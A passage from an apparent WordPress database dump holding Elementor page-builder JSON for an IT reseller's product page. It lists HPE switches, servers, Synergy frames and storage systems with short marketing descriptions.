style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3f5f006\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fed6471\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4419ab2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"145a6dc\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5715260\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aeec70b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"50f2e58\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"99ae68c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Switches<\\/strong><\\/h2>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"823bc65\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f135ea8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"f3e7bd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6921 48SFP+ 6QSFP+ x86 ONIE AC Back-to-Front Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2523\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6921-48SFP-6QSFP-x86-ONIE-AC-Back-to-Front-Switch.png\\\" alt=\\\"\\\" width=\\\"219\\\" height=\\\"165\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Altoline 6921 Switch Series is an x86-based OCP certified, open-networking, disaggregated family of low-latency 10GbE data center switches in a 1U form factor. Perfect for deployment in web-scale environments as a 10GbE server access switch; optimized for data center hot\\/cold aisle deployments with reversible airflow. Hardware support for VXLAN is ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c2d0f78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"9dd34f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Altoline 6960 32QSFP28 x86 ONIE AC Front-to-Back Switch<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2524\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Altoline-6960-32QSFP28-x86-ONIE-AC-Front-to-Back-Switch.png\\\" alt=\\\"\\\" width=\\\"244\\\" height=\\\"184\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Altoline 6960 Switch Series is an open-networking, disaggregated family of low latency 100\\/50\\/25GbE data center switches in a 1U form factor. Perfect for deployment in data center environments as 25GbE server access, or 100\\/50GbE spine switches. It is optimized for data center hot\\/cold aisle deployments with reversible airflow. The hardware support for VXLAN makes the Altoline 6960 ideal for deployment in multi-tenancy and overlay environments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5490442\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"0fae7b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c4c6953\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7341cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"af59a7b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ac4e02\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"fa822d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"9\",\"right\":\"9\",\"bottom\":\"9\",\"left\":\"9\",\"isLinked\":true}},\"elements\":[{\"id\":\"608d110\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">To discover more, please click the button below or contact us to discuss your needs.<\\/p><p style=\\\"text-align: center;\\\">[maxbutton id=\\\"1\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8613,3657,'_edit_last','1'),(8451,3640,'_wp_page_template','template-fullwidth.php'),(8452,3640,'_elementor_edit_mode','builder'),(8453,3640,'_elementor_template_type','post'),(8454,3640,'_elementor_version','2.5.14'),(8455,3640,'_elementor_data','[{\"id\":\"e3617cd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"43a7986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2911cf1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SERVER AND SYSTEM<\\/h2>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23469e8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7ff144f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"b99977c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Rack Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Rack-optimized servers that modernize your data center by delivering performance, resiliency, and scalability for core business-to-business-critical workloads.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6146b0a\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"6698963\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"5ba2b0b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL325 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2509 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL325-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Secure and versatile single socket (1P) 1U AMD EPYC\\u2122 based platform offers an exceptional balance of processor, memory and I\\/O for virtualization and data intensive workloads. With up to 32 cores, up to 16 DIMMs, 2 TB memory capacity and support for up to 10 NVMe drives, this server delivers 2P performance with 1P economics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"75d2a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"eb529d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant DL385 Gen10 Server<\\/strong><\\/h4><hr \\/><p><img class=\\\"wp-image-2511 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-DL385-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"241\\\" height=\\\"181\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">Hewlett Packard Enterprise is extending the worlds most secure industry standard servers to include the HPE ProLiant DL385 Gen10 server, utilizing the AMD EPYC 7000 Series processors. This platform has been designed with the security you need and the flexibility you require to accommodate demanding enterprise workloads. With up to 64 cores, up to 32 DIMMs, or 4 TB memory capacity and support for up to 24 NVMe drives, the HPE ProLiant DL385 Gen10 server delivers a low cost virtual machine (VM) with unprecedented security.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"54d4bd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2796cf3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Apollo 6000 Chassis<\\/strong><\\/h4><hr \\/><p><img class=\\\"alignnone wp-image-2512 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Apollo-6000-Chassis.png\\\" alt=\\\"\\\" width=\\\"235\\\" height=\\\"160\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Apollo k6000 Chassis is designed with density optimization and HPC solution integration in mind to address these demands. The new modular, fully integrated, and highly flexible chassis is designed to hold the Hewlett Packard Enterprise Gen10 compute servers to fit your specific HPC workloads. It accommodates up to 24 HPE ProLiant XL230k Gen 10 Server trays, redundant power and cooling, Ethernet and high speed fabric switches to address various HPC workload needs. It is a performance optimized, air-cooled solution that fits in customer\\u2019s space limitations. This solution offers outstanding configuration flexibility, simplified administration and rack-scale efficiency that lowers the total cost of ownership (TCO) needed for mass scale HPC deployments.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"40400cb\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b8fcbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2855b1a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"678fabe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"fa51356\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fc8f82c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"4c8fa09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"eecdb46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6841163\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a548724\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23f429a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f63f973\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ef27847\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Tower Servers<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Lower costs, boost productivity and keep your small or midsize business running smoothly with servers that provide the options, tools and support you need.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8df486\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d2666d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"96abc95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML110 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2513\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML110-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"169\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE ProLiant ML110 Gen10 server is an enhanced tower with performance, expansion, and growth at an affordable price. It meets most small- and mid-sized businesses\\u2019 needs as well as accelerates your business compute. The ProLiant ML110 Gen10 is a single processor tower form factor that can also be placed in a rack server cabinet using 4.5U of rack space. It includes up to five PCIe slots with room to grow with eight large form factor (LFF) or 16 small form factor (SFF) disk drives. It provides six DDR4 DIMM slots supporting HPE DDR4 SmartMemory with a maximum capacity of 192 GB. The HPE ProLiant ML110 Gen10 server also offers optional redundant fan and redundant power supply to satisfy automatic fail-over needs, making this the ideal server for small- to mid-sized businesses and remote offices and branch offices.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f088196\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c202494\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE ProLiant ML350 Gen10 Server<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2514\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-ProLiant-ML350-Gen10-Server.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"185\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE ProLiant ML350 Gen10 server delivers a secure dual-socket tower server with performance, expandability, and proven reliability making it the choice for expanding SMBs, remote offices of larger businesses, and enterprise data centers.\\u00a0The shorter re-designed rackable chassis with multiple upgrade options provides flexibility that can expand as your business needs grow. It supports 12 Gb\\/s SAS, NVMe SSD, embedded 4x1GbE NIC with a broad range of graphics and compute options.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6c3f725\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7af140c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1963cc6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"528c188\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d3d82f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"02284db\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"209c77a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"465decc\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9df2da5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"745e40c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d0111a7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>HPE Synergy<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Composable, software-defined infrastructure that speeds application delivery.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e25b4f6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"e344f90\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"e99ae7d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy 12000 Frame<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2515\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-12000-Frame.png\\\" alt=\\\"\\\" width=\\\"226\\\" height=\\\"170\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE Synergy 12000 Frames are uniquely architected as Composable Infrastructure (CI) to match the powerful \'infrastructure-as-code\' capabilities of the HPE intelligent software architecture. Flexible access to compute, storage, and fabric resources allows for use and re-purposing. Linking multiple HPE Synergy Frames efficiently scales the infrastructure with a dedicated single view of the entire management network.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"62e0e2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"40915d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE Synergy D3940 Storage Module<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2516\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-Synergy-D3940-Storage-Module.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">The HPE Synergy D3940 Storage Module provides a fluid pool of storage resources for the Composable Infrastructure. Additional capacity for compute modules is easily provisioned and intelligently managed with integrated data services for availability and protection. The 40 SFF drive bays per storage module can be populated with 12 G SAS or 6 G SATA drives. Expand up to 4 storage modules in a single Synergy 12000 Frame for a total of 200 drives.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"70339e4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"6a96ca1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c8c89\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da0887c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"57c273b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"296570e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d7056bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"34066b9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f501a1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"bb27a6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"-1\",\"right\":\"-1\",\"bottom\":\"-1\",\"left\":\"-1\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"2cf5757\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\"><strong>Data Storage<\\/strong><\\/h2><p style=\\\"text-align: center;\\\">Flash storage-integrated, built-for-the-cloud data protection that delivers unparalleled backup, archive and disaster recovery for your enterprise apps.<\\/p>\",\"_border_color\":\"#e9e9e9\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"efbecc6\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"-2\",\"right\":0,\"bottom\":\"-2\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"243cf87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"c45d541\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE StoreOnce Systems<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\">\\u00a0<br \\/><img class=\\\"alignnone wp-image-2517\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-StoreOnce-Systems.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"156\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE StoreOnce Systems with StoreOnce Catalyst provide a single, high-performance backup architecture that spans the entire enterprise. You can reduce the amount of backup data you need to store by 95% and choose between powerful dedicated appliances for larger offices and data centers, and flexible virtual appliances for smaller and remote offices. Industry leading backup and restore speeds mean that you can meet shrinking backup windows and recovery SLAs. StoreOnce Catalyst prevents exposure of backup copies to ransomware.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c301724\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"c16a918\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 8000 Storage<\\/strong><\\/h4><hr \\/><p style=\\\"text-align: center;\\\"><img class=\\\"alignnone wp-image-2518\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-8000-Storage.png\\\" alt=\\\"\\\" width=\\\"232\\\" height=\\\"166\\\" \\/><\\/p><p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 8000 Storage, with the lowest all-flash starting price, delivers the performance advantages of a purpose-built, flash-optimized architecture without compromising resiliency, data services, or data mobility. Unlike other purpose-built flash arrays, 3PAR StoreServ 8000 doesn\\u2019t require you to introduce an entirely new architecture to achieve flash-optimized performance. With unmatched versatility, performance, and density, HPE 3PAR StoreServ 8000 Storage has you covered with unified storage of block &amp; file protocols, application managed data protection and simplified fabric zoning along with SAN diagnostics.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af04195\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"b45681b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>HPE 3PAR StoreServ 9000 Storage<\\/strong><\\/h4>\\n\\n<hr \\/>\\n&nbsp;\\n<img class=\\\"wp-image-2519 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/HPE-3PAR-StoreServ-9000-Storage.png\\\" alt=\\\"\\\" width=\\\"222\\\" height=\\\"171\\\" \\/>\\n<p style=\\\"text-align: center;\\\">HPE 3PAR StoreServ 9000 Storage helps you consolidate primary storage workloads \\u2013 for file and block -- onto an enterprise-class flash array without compromising performance, scalability, data services, or resiliency. This HPE 3PAR 9000 Storage is based on the proven HPE 3PAR architecture and is purpose built for all-flash consolidation, delivering the performance, simplicity and agility needed to support your hybrid IT environment. Whether your applications are virtualized, containerized, or traditional, the HPE 3PAR StoreServ 9000 Storage offers you a solution that can deliver improved business results.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4ffd0fc\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"30\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"75f50e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"cb4169e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton id=\\\"13\\\"]<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"067e237\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"border_color\":\"#e9e9e9\"},\"elements\":[{\"id\":\"3849c5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<hr \\/>\\n&nbsp;\\n<p style=\\\"text-align: center;\\\"><strong>[maxbutton 